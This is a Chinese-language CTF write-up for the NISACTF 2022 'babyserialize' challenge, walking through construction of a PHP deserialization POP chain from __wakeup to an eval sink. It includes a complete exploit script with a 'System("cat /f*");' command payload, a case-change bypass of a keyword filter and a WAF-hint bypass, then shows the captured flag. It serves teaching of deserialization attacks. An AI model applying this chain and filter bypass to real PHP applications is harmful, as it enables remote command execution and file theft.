[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)

目录

一、理清pop链并进行标注

二、如何编写相关脚本

三、过滤与绕过

1、waf的绕过

2、preg_match的绕过


做这道题作为pop链的构造很典型,也很有意思,因为还存在一些其他东西。

打开链接,这种很多类的PHP代码多半是需要构造pop链

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第1张图片

一、理清pop链并进行标注

 先找eval、flag这些危险函数和关键字样(这就是链尾),找到eval函数,且参数是txw4ever

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第2张图片

 

我们可以利用这个txw4ever,来调用系统函数实现命令执行

OK,下面开始教你们做标注

首先我们找到第一步用到的参数所在位置,并在后面标注清楚需要传入的内容

1可以理解为第一步,shell表示我们这里需要传入一个类似shell的东西或者用system标注

传给谁就标注在谁的后面,这里表示要传给txw4ever,而txw4ever是在NISA类下

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第3张图片

标注好后,我们回到PHP源码,往eval上面看,发现需要触发__invoke()函数

__invoke是对象被当做函数进行调用时就会触发,我们去找类似$a()这种的(所有类里面找)

找到$bb(),它对应的参数是su,且在类Ilovetxw里[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第4张图片

同理我们进行标注,表示要调用参数su,传入NISA类

 [NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第5张图片

标注好后,我们回到PHP源码,往bb上面看,发现需要触发__toString()函数 

__ToString⽅法是当对象被当做字符串的时候会自动调用

继续在所有类里面找,找到strtolower函数,该函数是将字符串转换成小写

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第6张图片

 对应参数 a ,在four类里,我们找到a的位置继续进行标注

因为这里还存在一个if的判断语句,需要符合才能执行后面语句,所有还需要给fun也赋值

因为fun是私有变量,我们最好直接在类里面修改

原来$fun='abc'; 将它修改为下图所示

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第7张图片

回到PHP源码,继续往上我们找到__set函数

__set是对不存在或者不可访问的变量进行赋值就会自动调用

于是我们找到huang,我们可以看到在Ilovetxw类里面并不存在fun这个参数

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第8张图片

同样进行标注

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第9张图片 

后面我就不详细理下去了,相信你们已经明白了

(不懂的欢迎私信我,可以给你们一对一慢慢详细讲解)

依次往上追到__call函数,__call是对不存在的方法或者不可访问的方法进行调用就自动调用

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第10张图片

找到nisa,该类中并不存在这个方法,再往上就找到wakeup函数, 即我们的链头了

该函数在使用unserilize之前就会触发。

以及相关的标注:

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第11张图片

我都感觉我讲得太详细了,听懂了的评论区扣个666

至此,我们理清了pop链,并进行了传参的相关标注

二、如何编写相关脚本

先将所有类复制下来放进VS(前面加上

在这些类后面,我们开始写脚本,我先将完整的能跑出flag的脚本给大家:

fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext; //5 Ilovetxw
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang; //4 four
    public $su; //2 NISA

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER"; //3 Ilovetxw
    private $fun='sixsixsix'; //fun = "sixsixsix

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}


$n = new NISA();
$n->txw4ever = 'System("cat /f*");';
$n->fun = "666";
$i = new Ilovetxw();
$i->su = $n;
$f = new four();
$f->a = $i;
$i = new Ilovetxw();
$i->huang = $f;
$t = new TianXiWei();
$t->ext = $i;
echo urlencode(serialize($t));

我们就根据刚才标注的12345顺序来写,用到哪个类时,必须先用new实例化一遍

(哪怕重复用到了某个类,也需要重新实例化一遍,比如上面的Ilovetxw类)

给大家开个头吧,我们先用到NISA类,所以实例化NISA类:$n = new NISA();

$n->txw4ever表示调用这个类里面的txw4ever,后面传入我们想要传入的内容即可

至于为什么改fun的值,我们后面再说;

至此我们完成了1步骤,继续往下看,来到2

我们用到Ilovetxw类,将其实例化,同理根据标注进行调用传参即可

这样我们就可以写出后面所以的脚本了

三、过滤与绕过

这里存在两个需要绕过的地方,源码有给提示

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第12张图片

1、waf的绕过

这里有一个hint函数,触发就会输出一些提示的东西

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第13张图片

找到hint函数位置,在第一个类,如何绕过这个函数 ,只需让if语句判断不成立即可

所以你现在知道为什么前面我们需要修改fun的值了吧。

如果没有改fun的值,你只能得到一个提示,flag在根目录

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第14张图片

 

2、preg_match的绕过

preg_match用来进行正则匹配,但没给匹配的内容,用的......,暗示我们存在关键字的过滤,

这里system被过滤掉了,如果我们原封不动的使用system,不出意外会返回 something wrong

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第15张图片

OK,就不跟大家唠叨了,咱直接拿flag

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)_第16张图片

 NSSCTF{eaa7fba4-17d4-4f17-ad15-38f20c0bf961}

 

你可能感兴趣的:(PHP,web,php,反序列化漏洞,pop链构造,脚本编写,网络安全)